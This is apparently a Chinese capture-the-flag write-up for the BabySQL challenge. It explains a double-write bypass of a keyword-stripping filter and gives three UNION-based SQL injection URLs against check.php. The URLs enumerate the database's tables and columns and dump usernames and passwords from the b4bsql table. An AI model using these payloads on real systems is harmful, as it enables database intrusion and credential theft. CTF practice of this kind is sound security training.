[极客大挑战 2019]BabySQL

知识点

sql注入

双写绕过

解题

注意information_schema中包含or，所以双写绕过为infoorrmation_schema

check.php?username=1%27ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23&password=123

?username=1%27ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name="b4bsql"%23&password=123

?username=1%27ununionion selselectect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql%23&password=123

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[极客大挑战 2019]BabySQL.md

[极客大挑战 2019]BabySQL.md

[极客大挑战 2019]BabySQL

知识点

解题

Files

[极客大挑战 2019]BabySQL.md

Latest commit

History

[极客大挑战 2019]BabySQL.md

File metadata and controls

[极客大挑战 2019]BabySQL

知识点

解题